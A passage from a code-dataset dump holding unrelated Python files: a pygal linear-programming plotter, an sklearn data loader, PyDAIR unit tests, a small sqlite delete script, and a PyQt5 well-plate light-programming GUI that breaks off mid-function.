pygal.XY(show_y_guides=True, legend_at_bottom=True,\r\n dynamic_print_values=True, print_values_position='top',\r\n legend_at_bottom_columns=2, interpolate='cubic')\r\n\r\n # Define o titulo do gráfico\r\n xy_chart.title = f'PROBLEMA DE {problema_de[fObjetivo.objetivo]}\\n Solução Ótima-> {fObjetivo.rotulos[0]}({fObjetivo.letras[0]}):{fObjetivo.solucao[0]:.3f} | {fObjetivo.rotulos[1]}({fObjetivo.letras[1]}):{fObjetivo.solucao[1]:.3f} '\r\n\r\n # Adiciona no gráfico os pontos da reta da função objetivo\r\n xy_chart.add(f'{fObjetivo.objetivo.upper()}: {str(fObjetivo)}',\r\n fObjetivo.getPontosDaReta(), stroke_style={'width': 5, 'dasharray': '3,6', 'linecap': 'round'})\r\n\r\n # Adiciona no gráfico os pontos da reta de todas as restrições\r\n for i, restricao in enumerate(restricoes):\r\n xy_chart.add(f'R{i+1}: {str(restricao)}: {restricao.inclinacao}', restricao.getPontosDaReta(),\r\n stroke_style={'width': 2})\r\n\r\n # Adiciona o ponto da solução ótima\r\n xy_chart.add(f'SOLUÇÃO ÓTIMA: {fObjetivo.solucao}', [{'value': fObjetivo.solucao, 'node': {'r': 0}},\r\n {'value': fObjetivo.solucao, 'node': {\r\n 'r': 6}, 'style': 'stroke: black; stroke-width: 5'}\r\n ], stroke_style={'width': 2})\r\n\r\n for vertice in resultado['pares_ord_validos']:\r\n if fObjetivo.solucao == vertice:\r\n continue\r\n xy_chart.add(None, [{'value': vertice, 'node': {'r': 6}},\r\n {'value': vertice, 'node': {'r': 0}}\r\n ], stroke_style={'width': 2})\r\n\r\n # xy_chart.add(None, [{'value': (0, 40), 'node': {'r': 0}, 'style': {'fill: red; stroke: black; stroke-width: 10'},\r\n # {'value': (0, 0), 'node': {'r': 0}}\r\n # ], stroke_style={'dasharray': '0', 'width': 2, 'linecap': 'round', 'linejoin': 'round', 'line': 'black'\r\n # })\r\n\r\n return xy_chart.render_data_uri()\r\n\r\n\r\ndef gerar_grafico_line(resultado):\r\n \"\"\"Função para protar o gráfico do tipo linha\r\n \r\n Arguments:\r\n resultado {dict} -- dicionário com a seguinte listas: ['restricoes', 'lista_completa_pares_ordenados', 'pares_ord_validos', 'lista_func_vertices_validos', 'funcao_objetivo']\r\n\r\n Returns:\r\n xy_chart.render_data_uri() -- grafico para ser renderizado pelo flask\r\n \"\"\"\r\n problema_de = {'max': 'MAXIMIZAÇÃO', 'min': 'MINIMIZAÇÃO'}\r\n fObjetivo = resultado.get('funcao_objetivo')\r\n vertices = resultado['pares_ord_validos']\r\n\r\n # Cria estância do grafico a ser plotado\r\n chart = pygal.XY(xrange=(0, int(fObjetivo.trono[0])), show_y_guides=True, legend_at_bottom=True,\r\n dynamic_print_values=True, print_values_position='top',\r\n legend_at_bottom_columns=2)\r\n\r\n # Adiciona o título do gráfico\r\n chart.title = f'PROBLEMA DE {problema_de[fObjetivo.objetivo]}\\n Solução Ótima-> {fObjetivo.rotulos[0]}({fObjetivo.letras[0]}):{fObjetivo.solucao[0]:.3f} | {fObjetivo.rotulos[1]}({fObjetivo.letras[1]}):{fObjetivo.solucao[1]:.3f}'\r\n\r\n # Adiciona a lista de pontos válidos no grafico e preenche a cor da área plotada\r\n chart.add('REGIÃO VIÁVEL', ordenar_vertices(vertices) , fill=True)\r\n\r\n # Adiciona pontos da reta da função objetivo\r\n chart.add('FUNÇÃO OBJETIVA MAX.', fObjetivo.getPontosDaReta())\r\n\r\n # Adiciona o ponto da função objetivo\r\n chart.add('SOLUÇÃO ÓTIMA', [fObjetivo.solucao], dots_size=6)\r\n \r\n return chart.render_data_uri()\r\n\r\n\r\ndef ordenar_vertices(vertices):\r\n \"\"\"Função para ordenar os vertices\r\n \r\n Arguments:\r\n vertices {list(tuple)} -- lista de tuplas com as coordenadas válidas\r\n\r\n Returns:\r\n vertices_sorted {list(tuple)} -- lista de tuplas ordenadas para plotagem\r\n \"\"\"\r\n vertices_sorted = sorted(copy.deepcopy(vertices))\r\n\r\n for i in range(len(vertices_sorted) - 1):\r\n if i < len(vertices_sorted)//2:\r\n continue\r\n if vertices_sorted[i][0] == vertices_sorted[i+1][0]:\r\n if vertices_sorted[i][1] < vertices_sorted[i+1][1]:\r\n vertices_sorted[i], vertices_sorted[i+1] = vertices_sorted[i+1], vertices_sorted[i]\r\n\r\n if len(vertices_sorted) > 3:\r\n vertices_sorted.append(vertices_sorted[0])\r\n \r\n return vertices_sorted\r\n\r\n","repo_name":"microrepar/programacao-linear-metodo-grafico","sub_path":"app/plotter.py","file_name":"plotter.py","file_ext":"py","file_size_in_byte":5338,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25640040244","text":"from sklearn import datasets, preprocessing\nfrom sklearn.utils import check_random_state\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import OneHotEncoder\n\n\ndef load_data(larger=False, method='cg'):\n if larger and method=='cg':\n X, y = datasets.fetch_openml('mnist_784', version=1, return_X_y=True)\n random_state = check_random_state(0)\n permutation = random_state.permutation(X.shape[0])\n X = X[permutation]\n y = y[permutation]\n X = X.reshape((X.shape[0], -1))\n #truncate dataset\n X = X[:1000]\n y = y[:1000]\n return train_test_split(X, y, test_size=(1 / 5.))\n elif method=='cg':\n dataset = datasets.load_iris()\n data, target = dataset.data, dataset.target\n data_scaler = preprocessing.MinMaxScaler()\n return train_test_split(\n data_scaler.fit_transform(data),\n target,\n test_size=0.15\n )\n elif larger:\n X, y = datasets.fetch_openml('mnist_784', version=1, return_X_y=True)\n random_state = check_random_state(0)\n permutation = random_state.permutation(X.shape[0])\n X /= 255.\n X -= X.mean(axis=0)\n X = X[permutation]\n y = y[permutation]\n X = X.reshape((X.shape[0], -1))\n #truncate dataset\n data_scaler = preprocessing.MinMaxScaler()\n X = X[:1000]\n y = y[:1000]\n target_scaler = OneHotEncoder(sparse=False, categories='auto')\n return train_test_split(\n data_scaler.fit_transform(X),\n target_scaler.fit_transform(y.reshape(-1, 1)),\n test_size=(1 / 5.))\n else:\n dataset = datasets.load_iris()\n data, target = dataset.data, dataset.target\n print(data.shape, target.shape)\n data_scaler = preprocessing.MinMaxScaler()\n target_scaler = OneHotEncoder(sparse=False)\n return train_test_split(\n data_scaler.fit_transform(data),\n target_scaler.fit_transform(target.reshape(-1, 1)),\n test_size=0.15\n )\n","repo_name":"pppplin/Optimization-MP","sub_path":"MP1/data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":2138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4275535808","text":"import os\nimport sys\nimport argparse\nimport subprocess\nimport unittest\nfrom PyDAIR.seq.IgSeq import IgSeq\nfrom PyDAIR.io.PyDAIRIO import *\nfrom PyDAIR.utils.PyDAIRUtils import *\nfrom PyDAIR.utils.PyDAIRArgs import *\nfrom PyDAIR.app.PyDAIRAPP import *\n\n_data_path = os.path.join(os.path.dirname(__file__), 'data/samples')\n_db_path = os.path.join(os.path.dirname(__file__), 'data/db')\n_result_path = os.path.join(os.path.dirname(__file__), 'data/results')\n\nclass Test_app(unittest.TestCase):\n \n def setUp(self):\n pass\n \n \n def test_app_parseseq(self):\n # variables settings\n v_gene_align_args = PyDAIRBlastArgs(_db_path + '/v', 3, -3, 6, 6, 21, 1e-80)\n d_gene_align_args = PyDAIRBlastArgs(_db_path + '/d', 1, -1, 0, 2, 4, 1)\n j_gene_align_args = PyDAIRBlastArgs(_db_path + '/j', 3, -3, 6, 6, 7, 1e-5)\n q_fasta = _data_path + '/sample.1.fa'\n v_gene_fasta = _db_path + '/v.fa'\n d_gene_fasta = _db_path + '/d.fa'\n j_gene_fasta = _db_path + '/j.fa'\n output_prefix = _result_path + '/test_output_app_parseseq'\n \n # PyDAIR arguemnts settings\n pydair_args = PyDAIRParseSeqArgs(q_fasta, v_gene_fasta, d_gene_fasta, j_gene_fasta,\n output_prefix,\n v_gene_align_args, d_gene_align_args, j_gene_align_args,\n v_motif = 'YYC', j_motif = 'WG.G')\n pydairapp = PyDAIRAPPParseSeq(pydair_args)\n pydairapp.blast('v')\n pydairapp.blast('j')\n pydairapp.parse_VJ()\n pydairapp.write_pydair()\n pydairapp.write_fasta('unaligned_seq')\n pydairapp.blast('d')\n pydairapp.parse_VDJ()\n pydairapp.write_pydair()\n \n \n \n def test_app_stats(self):\n sample_names = ['ID 1', 'ID 2', 'ID 3']\n pydair_files = [_data_path + '/sample.1.pydair',\n _data_path + '/sample.2.pydair',\n _data_path + '/sample.3.pydair']\n pydair_args = PyDAIRStatsArgs(sample_names, pydair_files, True, False, True, 2,\n _result_path + '/test_output_app_analysis_hasambigoD')\n pydairapp = PyDAIRAPPStats(pydair_args)\n pydairapp.write_summary()\n pydairapp.create_report()\n \n \n def test_app_eval(self):\n app_args = PyDAIREvalArgs(_data_path + '/sample.simseq.fa',\n _data_path + '/sample.simseq.parsed.pydair',\n _result_path + '/test_output_app_eval.txt')\n evalobj = PyDAIRAPPEval(app_args)\n evalobj.eval()\n \n \n def test_app_sim(self):\n app_args = PyDAIRSimArgs(_result_path + '/test_output_app_sim.fa',\n 100,\n _db_path + '/v.fa', 20, 3,\n _db_path + '/d.fa', 3, 3,\n _db_path + '/j.fa', 5, 3,\n 5, 5, 0.05, 1010)\n simobj = PyDAIRAPPSim(app_args)\n simobj.generate_seq()\n \n \n \nif __name__ == '__main__':\n unittest.main()\n\n","repo_name":"biunit/PyDAIR","sub_path":"PyDAIR/test/test_app.py","file_name":"test_app.py","file_ext":"py","file_size_in_byte":3172,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"28330602566","text":"# criar um programa que remova pedidos com base no id da seguinte forma:\nimport sqlite3\nconexao = sqlite3.connect(\"Aula_Semana4\")\ncursor = conexao.cursor()\npedido_id = input(\"Qual o ID do pedido que deseja remover? \")\nvalores = [pedido_id]\nsql = \"delete from pedido where id = ?\"\ncursor.execute(sql, valores)\nconexao.commit()\nconexao.close()","repo_name":"valdinei84/Projetos-Python","sub_path":"MODULO 2 SQL E BANCO DE DADOS/Semana 4 Criando BD e inserindo dados/Removendo Dados.py","file_name":"Removendo Dados.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"39647152803","text":"from PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import * \nfrom PyQt5.QtCore import *\n\nfrom pyqtgraph import PlotWidget, plot\nimport pyqtgraph as pg\n\nimport ast\nimport os\n\nimport numpy as np\nfrom math import sqrt\n\nfrom wellInforamtion import wellInfoWindow\n\nbasedir = os.path.dirname(__file__)\n\nclass well_buttons(QWidget):#\n #Creation of widgets\n def __init__(self, framerate):\n super().__init__()\n\n self.plate_type = 96\n self.plate_nr = 0\n\n self.plate_nr_type = {0: 96, 1: 96}\n\n self.plate_width = 8\n self.plate_height = 12\n self.well_button_size = 30\n self.well_button_radius = 15\n\n self.color = 'Off'\n self.wvMax = 255\n self.wvMin = 0\n self.wvStart = 'Low'\n self.wvLen = 10\n self.dutyCyclePWM = 0.5\n self.periodPWM = 10\n\n self.framerate = framerate\n\n self.StepGBoxes = {}\n self.StepInformations = {}\n self.amount_of_steps = 1\n self.selceted_step = 1\n\n self.ButtonNrTL = 1\n self.selected_wells = set()\n self.used_wells_plate_1 = {}\n self.used_wells_plate_2 = {}\n self.Button_to_pos = {}\n self.Pos_to_Button = {}\n\n self.plotPreviewDisplayed = False\n self.wellInfoWin = None\n \n self.setWindowTitle('opto GUI')\n self.createPlotPreview(10)\n self.createPlateChooserBox()\n self.createCurrentStepBox()\n self.createProgrammBox()\n self.createActions()\n self.createContextMenu()\n \n self.selectWellsRB.setChecked(True)\n\n self.graphProgrammStack = QStackedWidget(self)\n self.graphProgrammStack.addWidget(self.ProgrammGBox)\n self.graphProgrammStack.addWidget(self.graphWidget)\n\n Programm_HLayout = QVBoxLayout()\n Programm_HLayout.addWidget(self.PlateChooserBox)\n Programm_HLayout.addWidget(self.graphProgrammStack)\n\n self.mainLayout = QHBoxLayout()\n self.mainLayout.addLayout(Programm_HLayout)\n self.mainLayout.addWidget(self.CurrentStepGBox)\n self.setLayout(self.mainLayout)\n\n def createwellButtonBox(self):\n\n self.wellButtonBox = QGroupBox(\"Select wells\")\n wells_layout = QGridLayout()\n\n rows_per_plate, cols_per_plate = self.plate_height, self.plate_width\n\n self.select_buttons = {}\n self.well_buttons = {}\n self.Button_to_pos = {}\n self.Pos_to_Button = {}\n\n self.select_all_button = QPushButton('All', self)\n self.select_all_button.\\\n setStyleSheet(\"border-radius : {radius}; border: 1px solid black;\".format(radius = 15))\n self.select_all_button.setFixedSize(30, 30)\n self.select_all_button.clicked.connect(self.select_all)\n wells_layout.addWidget(self.select_all_button, 0, 0, alignment = Qt.AlignCenter)\n\n for col in range(cols_per_plate):\n col_nr = col + 1\n self.select_buttons['Button_C' + str(col_nr)] = QPushButton('', self)\n self.select_buttons['Button_C' + str(col_nr)].\\\n setStyleSheet(\"border-radius : {radius}; border: 1px solid black;\".format(radius = 15))\n self.select_buttons['Button_C' + str(col_nr)].setIcon(QIcon(os.path.join(basedir, 'resources', 'arrow-down.svg')))\n self.select_buttons['Button_C' + str(col_nr)].setFixedSize(30, 30)\n self.select_buttons['Button_C' + str(col_nr)].clicked.connect(lambda ignore, i=col_nr: self.select_col(i))\n wells_layout.addWidget(self.select_buttons['Button_C' + str(col_nr)], 0, col + 1, alignment = Qt.AlignCenter)\n\n for row in range(rows_per_plate):\n row_nr = row + 1\n self.select_buttons['Button_R' + str(row_nr)] = QPushButton('', self)\n self.select_buttons['Button_R' + str(row_nr)].\\\n setStyleSheet(\"border-radius : {radius}; border: 1px solid black;\".format(radius = 15))\n self.select_buttons['Button_R' + str(row_nr)].setIcon(QIcon(os.path.join(basedir, 'resources', 'arrow-right.svg')))\n self.select_buttons['Button_R' + str(row_nr)].setFixedSize(30, 30)\n self.select_buttons['Button_R' + str(row_nr)].clicked.connect(lambda ignore, i=row_nr: self.select_row(i))\n wells_layout.addWidget(self.select_buttons['Button_R' + str(row_nr)], row + 1, 0, alignment = Qt.AlignCenter)\n\n for x in range(cols_per_plate):\n for y in range(rows_per_plate):\n button_nr = x+y*cols_per_plate+1\n self.well_buttons['Button_' + str(button_nr)] = QPushButton('', self)\n self.Button_to_pos['Button_' + str(button_nr)] = (y, x)\n self.well_buttons['Button_' + str(button_nr)].\\\n setStyleSheet(\"border-radius : {radius}; border: 1px solid black;\".format(radius = self.well_button_radius))\n self.well_buttons['Button_' + str(button_nr)].setFixedSize(self.well_button_size, self.well_button_size)\n self.well_buttons['Button_' + str(button_nr)].clicked.connect(lambda ignore, i=button_nr: self.select_wells(i))\n self.well_buttons['Button_' + str(button_nr)].setContextMenuPolicy(Qt.CustomContextMenu)\n self.well_buttons['Button_' + str(button_nr)].customContextMenuRequested.connect(lambda point, i=button_nr: self.showWellContextMenu(i, point))\n wells_layout.addWidget(self.well_buttons['Button_' + str(button_nr)], y+1, x+1)\n self.wellButtonBox.setLayout(wells_layout)\n self.Pos_to_Button = {y: x for x, y in self.Button_to_pos.items()}\n\n def createPlateChooserBox(self):\n self.PlateChooserBox = QGroupBox(\"Choose Plate\")\n chooserForm_layout = QFormLayout()\n\n self.plate_chooser_CB = QComboBox()\n self.plate_chooser_CB.addItem(\"Plate 1\")\n self.plate_chooser_CB.addItem(\"Plate 2\")\n self.plate_chooser_CB.addItem(\"---\")\n\n self.plate_chooser_CBView = self.plate_chooser_CB.view()\n self.plate_chooser_CBView.setRowHidden(2, True)\n\n self.plate_chooser_CB.currentIndexChanged.connect(self.changePlate)\n\n self.plate_type_CB = QComboBox()\n self.plate_type_CB.addItem(\"96-well Plate\")\n self.plate_type_CB.addItem(\"24-well Plate\")\n self.plate_type_CB.addItem(\"6-well Plate\")\n self.plate_type_CB.addItem(\"Custom Shape\")\n\n self.plate_type_CBView = self.plate_type_CB.view()\n self.plate_type_CBView.setRowHidden(3, True)\n\n self.plate_type_CB.currentIndexChanged.connect(self.changePlateType)\n\n self.duplicate_plate_button = QPushButton('Duplicate Plate', self)\n self.duplicate_plate_button.clicked.connect(self.duplicate_plate)\n\n chooserForm_layout.addRow(QLabel('Choose Plate'), self.plate_chooser_CB)\n chooserForm_layout.addRow(QLabel('Choose Plate Type'), self.plate_type_CB)\n chooserForm_layout.addRow(QLabel(''), self.duplicate_plate_button)\n\n self.PlateChooserBox.setLayout(chooserForm_layout)\n\n def createParameterBox(self):\n self.ParameterBox = QGroupBox(\"Animate wells\")\n self.ParameterFormlayout = QFormLayout()\n\n self.color_chooser = QComboBox()\n self.color_chooser.addItem(\"Off\")\n self.color_chooser.addItem(\"Red\")\n self.color_chooser.addItem(\"Green\")\n self.color_chooser.addItem(\"Blue\")\n self.color_chooser.setCurrentText(self.color)\n self.color_chooser.currentIndexChanged.connect(self.changeWavetype)\n\n self.waveTypeCB = QComboBox()\n self.waveTypeCB.addItem(\"Constant\")\n self.waveTypeCB.addItem(\"Sine Wave\")\n self.waveTypeCB.addItem(\"Tri Wave\")\n self.waveTypeCB.addItem(\"Square Wave\")\n self.waveTypeCB.addItem(\"PWM\")\n self.waveTypeCB.addItem(\"Rise\")\n self.waveTypeCB.addItem(\"Fall\")\n self.waveTypeCB.setItemIcon(0, QIcon(os.path.join(basedir, 'resources', 'animation-static.svg')))\n self.waveTypeCB.setItemIcon(1, QIcon(os.path.join(basedir, 'resources', 'animation-sin.svg')))\n self.waveTypeCB.setItemIcon(2, QIcon(os.path.join(basedir, 'resources', 'animation-tri.svg')))\n self.waveTypeCB.setItemIcon(3, QIcon(os.path.join(basedir, 'resources', 'animation-sq.svg')))\n self.waveTypeCB.setItemIcon(4, QIcon(os.path.join(basedir, 'resources', 'animation-blink.svg')))\n self.waveTypeCB.setItemIcon(5, QIcon(os.path.join(basedir, 'resources', 'animation-rise.svg')))\n self.waveTypeCB.setItemIcon(6, QIcon(os.path.join(basedir, 'resources', 'animation-fall.svg')))\n self.waveTypeCB.currentIndexChanged.connect(self.changeWavetype)\n\n self.ParameterFormlayout.addRow(QLabel('Color: '), self.color_chooser)\n self.ParameterFormlayout.addRow(QLabel('Type: '), self.waveTypeCB)\n\n self.ParameterBox.setLayout(self.ParameterFormlayout)\n\n self.changeWavetype()\n\n def createGradientDesingerBox(self):\n self.GradientBox = QGroupBox(\"Gradient\")\n gradientForm_layout = QFormLayout()\n gradientSize_layout = QHBoxLayout()\n\n self.color_chooser_gradient = QComboBox()\n self.color_chooser_gradient.addItem(\"Red\")\n self.color_chooser_gradient.addItem(\"Green\")\n self.color_chooser_gradient.addItem(\"Blue\")\n\n self.width_gradient = QSpinBox()\n self.width_gradient.setMaximum(self.plate_width)\n self.width_gradient.setMinimum(2)\n self.width_gradient.setValue(8)\n self.width_gradient.valueChanged.connect(lambda: self.select_wells(self.ButtonNrTL))\n self.height_gradient = QSpinBox()\n self.height_gradient.setMaximum(self.plate_height)\n self.height_gradient.setMinimum(2)\n self.height_gradient.setValue(12)\n self.height_gradient.valueChanged.connect(lambda: self.select_wells(self.ButtonNrTL))\n gradientSize_layout.addWidget(self.width_gradient)\n gradientSize_layout.addWidget(QLabel(\"x\"))\n gradientSize_layout.addWidget(self.height_gradient)\n\n self.direction_chooser_gradient = QComboBox()\n self.direction_chooser_gradient.addItem(\"Top --> Bottom\")\n self.direction_chooser_gradient.addItem(\"Bottom --> Top\")\n self.direction_chooser_gradient.addItem(\"Left --> Right\")\n self.direction_chooser_gradient.addItem(\"Right --> Left\")\n\n self.max_gradient = QSpinBox()\n self.max_gradient.setMaximum(255)\n self.max_gradient.setValue(255)\n self.min_gradient = QSpinBox()\n self.min_gradient.setMaximum(254)\n self.min_gradient.valueChanged.connect(lambda x: self.max_gradient.setMinimum(self.min_gradient.value() + 1))\n self.max_gradient.valueChanged.connect(lambda x: self.min_gradient.setMaximum(self.max_gradient.value() - 1))\n\n gradientForm_layout.addRow(QLabel('Color'), self.color_chooser_gradient)\n gradientForm_layout.addRow(QLabel('Size'), gradientSize_layout)\n gradientForm_layout.addRow(QLabel('Direction'), self.direction_chooser_gradient)\n gradientForm_layout.addRow(QLabel('Min. intensity'), self.min_gradient)\n gradientForm_layout.addRow(QLabel('Max. intensity'), self.max_gradient)\n\n self.apply_button_gradient = QPushButton('Apply', self)\n self.apply_button_gradient.clicked.connect(self.createGradient)\n self.apply_button_gradient.setDefault(True)\n gradientForm_layout.addRow(QLabel(), self.apply_button_gradient)\n\n self.GradientBox.setLayout(gradientForm_layout)\n\n def createPlotPreview(self, stepLength):\n self.graphWidget = pg.PlotWidget()\n self.pen = pg.mkPen(color='red', width=2)\n\n self.graphWidget.setBackground('w')\n self.graphWidget.setLimits(xMin = 0, xMax = stepLength - self.framerate + (stepLength - self.framerate) * 0.05, yMin = -1, yMax = 256, minXRange = 5, minYRange = 25)\n labelStyle = {'color': 'black', 'font-size': '12pt'}\n self.graphWidget.setLabel('bottom', \"Time / min\", **labelStyle)\n self.graphWidget.setLabel('left', \"Intensity\", **labelStyle)\n self.graphWidget.setXRange(0, stepLength - self.framerate + (stepLength - self.framerate) * 0.05)\n self.graphWidget.setYRange(0, 260)\n\n self.data_line = self.graphWidget.plot([0], [0], pen=self.pen)\n\n def createCurrentStepBox(self):\n self.CurrentStepGBox = QGroupBox(\"Step 1\")\n self.CurrentStepGBox_Layout = QHBoxLayout()\n Parameter_Layout = QVBoxLayout()\n Preview_select_Layout = QVBoxLayout()\n\n rb_layout = QHBoxLayout()\n self.selectWellsRB = QRadioButton(\"Select wells\")\n self.selectWellsRB.toggled.connect(lambda: self.changeSelectionType(0))\n rb_layout.addWidget(self.selectWellsRB)\n self.getSettingsRB = QRadioButton(\"Get Settings\")\n self.getSettingsRB.toggled.connect(lambda: self.changeSelectionType(2))\n rb_layout.addWidget(self.getSettingsRB)\n self.createGradientRB = QRadioButton(\"Create gradient\")\n self.createGradientRB.toggled.connect(lambda: self.changeSelectionType(1))\n rb_layout.addWidget(self.createGradientRB)\n\n self.createwellButtonBox()\n self.createParameterBox()\n self.createGradientDesingerBox()\n \n Parameter_Layout.addLayout(rb_layout)\n Parameter_Layout.addWidget(self.ParameterBox)\n Parameter_Layout.addWidget(self.GradientBox)\n\n Preview_select_Layout.addStretch()\n Preview_select_Layout.addWidget(self.wellButtonBox)\n Preview_select_Layout.addStretch()\n\n self.CurrentStepGBox_Layout.addLayout(Parameter_Layout)\n self.CurrentStepGBox_Layout.addLayout(Preview_select_Layout)\n\n self.CurrentStepGBox.setLayout(self.CurrentStepGBox_Layout)\n\n def createProgrammBox(self):\n self.ProgrammGBox = QGroupBox(\"Programm\")\n ProgrammBox_layout = QVBoxLayout()\n\n self.addProgram_Button = QPushButton('Add Step', self)\n self.addProgram_Button.clicked.connect(self.addStep)\n\n self.scrollArea = QScrollArea()\n self.scrollArea.setWidgetResizable(True)\n self.scrollAreaWidget = QWidget()\n self.scrollAreaWidgetLayout = QVBoxLayout(self.scrollAreaWidget)\n self.scrollAreaWidgetLayout.addItem(QSpacerItem(20, 40, QSizePolicy.Minimum, QSizePolicy.Expanding))\n self.scrollArea.setWidget(self.scrollAreaWidget)\n self.scrollArea.setMinimumWidth(400)\n self.addStepBox()\n self.changeStep(1)\n\n ProgrammBox_layout.addWidget(self.addProgram_Button)\n ProgrammBox_layout.addWidget(self.scrollArea)\n \n self.ProgrammGBox.setLayout(ProgrammBox_layout)\n\n def addStepBox(self, newStep = True):\n step_nr = self.amount_of_steps\n #StepBox Dict: step_nr: step_nr(0), GroupBox(1), EditButton(2), Delete Button(3), Hour spinBox(4), Min spinBox(5), Sec SpinBox(6)\n self.StepGBoxes[step_nr] = [step_nr,\n QGroupBox('Step ' + str(self.amount_of_steps), self.scrollAreaWidget),\n QPushButton('Edit', self), \n QPushButton('Delete', self),\n QSpinBox(), QSpinBox(), QSpinBox(),\n QPushButton('', self), \n QPushButton('', self)]\n \n self.StepGBoxes[step_nr][2].clicked.connect(lambda ignore: self.changeStep(self.StepGBoxes[step_nr][0]))\n self.StepGBoxes[step_nr][3].clicked.connect(lambda ignore: self.deleteStep(self.StepGBoxes[step_nr][0]))\n\n self.StepGBoxes[step_nr][7].setStyleSheet('border: 0px solid black')\n self.StepGBoxes[step_nr][7].setIcon(QIcon(os.path.join(basedir, 'resources', 'arrow-up.svg')))\n self.StepGBoxes[step_nr][8].setStyleSheet('border: 0px solid black')\n self.StepGBoxes[step_nr][8].setIcon(QIcon(os.path.join(basedir, 'resources', 'arrow-down.svg')))\n\n self.StepGBoxes[step_nr][7].clicked.connect(lambda ignore: self.moveStepUp(self.StepGBoxes[step_nr][0]))\n self.StepGBoxes[step_nr][8].clicked.connect(lambda ignore: self.moveStepDown(self.StepGBoxes[step_nr][0]))\n\n self.StepGBoxes[step_nr][4].setSuffix(' h')\n self.StepGBoxes[step_nr][4].valueChanged.connect(lambda ignore: self.updateDuration_info(self.StepGBoxes[step_nr][0]))\n self.StepGBoxes[step_nr][5].setSuffix(' min')\n self.StepGBoxes[step_nr][5].setMaximum(59)\n self.StepGBoxes[step_nr][5].setValue(10)\n self.StepGBoxes[step_nr][5].valueChanged.connect(lambda ignore: self.updateDuration_info(self.StepGBoxes[step_nr][0]))\n self.StepGBoxes[step_nr][6].setSuffix(' sec')\n self.StepGBoxes[step_nr][6].setMaximum(59)\n self.StepGBoxes[step_nr][6].valueChanged.connect(lambda ignore: self.updateDuration_info(self.StepGBoxes[step_nr][0]))\n\n StepGBox_Layout = QGridLayout(self.StepGBoxes[step_nr][1]) \n StepGBox_Layout.addWidget(QLabel('Set duration'), 0, 1, 1, 1)\n StepGBox_Layout.addWidget(self.StepGBoxes[step_nr][4], 0, 2, 1, 1)\n StepGBox_Layout.addWidget(self.StepGBoxes[step_nr][5], 0, 3, 1, 1)\n StepGBox_Layout.addWidget(self.StepGBoxes[step_nr][6], 0, 4, 1, 1)\n StepGBox_Layout.addWidget(self.StepGBoxes[step_nr][2], 1, 3, 1, 1)\n StepGBox_Layout.addWidget(self.StepGBoxes[step_nr][3], 1, 4, 1, 1)\n StepGBox_Layout.addWidget(self.StepGBoxes[step_nr][7], 0, 0, 1, 1)\n StepGBox_Layout.addWidget(self.StepGBoxes[step_nr][8], 1, 0, 1, 1)\n\n count = self.scrollAreaWidgetLayout.count() - 1\n self.scrollAreaWidgetLayout.insertWidget(count, self.StepGBoxes[step_nr][1])\n\n if newStep:\n self.StepInformations[step_nr] = [[self.StepGBoxes[step_nr][4].value(), self.StepGBoxes[step_nr][5].value(), self.StepGBoxes[step_nr][6].value()],\\\n {'Plate 1 Wells': {}, 'Plate 1 Type': self.plate_nr_type[0], 'Plate 2 Wells': {}, 'Plate 2 Type': self.plate_nr_type[1]}]\n\n #Actions and Menus\n def createActions(self):\n self.wellInformationAction = QAction('Informations', self)\n self.wellInformationAction.triggered.connect(self.showWellInformations)\n self.wellSettingsAction = QAction('Get Settings', self)\n self.wellSettingsAction.triggered.connect(self.getWellSettings) \n\n def createContextMenu(self):\n self.wellMenu = QMenu(self)\n self.wellMenu.addAction(self.wellInformationAction)\n self.wellMenu.addAction(self.wellSettingsAction)\n \n def showWellContextMenu(self, button_nr, point):\n button = 'Button_' + str(button_nr)\n self.rightClickButtonNr = button_nr\n self.wellMenu.exec_(self.well_buttons[button].mapToGlobal(point))\n\n # Functions\n def moveStepUp(self, step_nr):\n if step_nr > 1:\n selectedStep = self.StepInformations[step_nr].copy()\n topStep = self.StepInformations[step_nr - 1].copy()\n\n self.StepInformations[step_nr] = topStep\n self.StepInformations[step_nr - 1] = selectedStep\n\n topH = topStep[0][0]\n topM = topStep[0][1]\n topS = topStep[0][2]\n\n selH = selectedStep[0][0]\n selM = selectedStep[0][1]\n selS = selectedStep[0][2]\n\n self.StepGBoxes[step_nr][4].setValue(topH)\n self.StepGBoxes[step_nr][5].setValue(topM)\n self.StepGBoxes[step_nr][6].setValue(topS)\n\n self.StepGBoxes[step_nr - 1][4].setValue(selH)\n self.StepGBoxes[step_nr - 1][5].setValue(selM)\n self.StepGBoxes[step_nr - 1][6].setValue(selS)\n\n self.changeStep(step_nr - 1, modify_Step = True)\n \n def moveStepDown(self, step_nr):\n if step_nr < self.amount_of_steps:\n selectedStep = self.StepInformations[step_nr].copy()\n lowStep = self.StepInformations[step_nr + 1].copy()\n\n self.StepInformations[step_nr] = lowStep\n self.StepInformations[step_nr + 1] = selectedStep\n\n lowH = lowStep[0][0]\n lowM = lowStep[0][1]\n lowS = lowStep[0][2]\n\n selH = selectedStep[0][0]\n selM = selectedStep[0][1]\n selS = selectedStep[0][2]\n\n self.StepGBoxes[step_nr][4].setValue(lowH)\n self.StepGBoxes[step_nr][5].setValue(lowM)\n self.StepGBoxes[step_nr][6].setValue(lowS)\n\n self.StepGBoxes[step_nr + 1][4].setValue(selH)\n self.StepGBoxes[step_nr + 1][5].setValue(selM)\n self.StepGBoxes[step_nr + 1][6].setValue(selS)\n\n self.changeStep(step_nr + 1, modify_Step = True)\n\n def getWellSettings(self, button_nr = None):\n if button_nr is None:\n well = 'Button_' + str(self.rightClickButtonNr)\n else:\n well = 'Button_' + str(button_nr)\n wellinfo = {} \n if self.plate_nr == 0:\n try:\n wellinfo = self.StepInformations[self.selceted_step][1]['Plate 1 Wells'][well]\n except:\n wellinfo = None\n elif self.plate_nr == 1:\n try:\n wellinfo = self.StepInformations[self.selceted_step][1]['Plate 2 Wells'][well]\n except:\n wellinfo = None\n\n if wellinfo is not None:\n self.color = wellinfo['color']\n self.color_chooser.setCurrentText(self.color)\n wvType = wellinfo['waveType']\n\n if 